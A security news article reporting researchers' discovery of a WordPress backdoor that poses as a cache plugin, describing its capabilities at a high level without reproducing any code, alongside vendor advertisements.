A novel kind of malware that acts as a sophisticated backdoor that can carry out several operations while impersonating a legitimate plugin has been identified.
The malware has several features, including the ability to modify files, create an admin account, remotely activate and deactivate plugins, add filters to prevent itself from being listed among the activated plugins, and pinging functionality to check if the script is still active.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
WordPress Malware as Cache Plugin
The malicious file has access to standard WordPress functionality just like other plugins since it operates as a plugin inside of the WordPress environment, reports Defiant, the company behind the WordPress security plugin Wordfence.
The code above shows the creation of a new user account with the username ‘superadmin’ and a hardcoded password with admin-level privileges. When it is no longer required, the next function is designed to delete the superadmin account.
Bot detection code is frequently seen in malware that presents average content to specific users while diverting them to malicious websites or presenting malicious content to other types of users.
This hook is frequently used to insert other desirable stuff into posts or pages, alter excerpt lengths, or append disclaimers to posts or pages.
The malware is used to activate and deactivate arbitrary plugins remotely. Additionally, it contains other cleanup functions to remove malicious content from the database.
Remote Invocation
It looks for a certain user agent string that is required to manage this backdoor’s functionalities.
“Taken together, these features provide attackers with everything they need to remotely control and monetize a victim site, at the expense of the site’s own SEO rankings and user privacy”, researchers said.
Defiant’s malware scanner protects Premium, Care, and Response users during file uploads against the upload of this sample and many of its variations.
Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.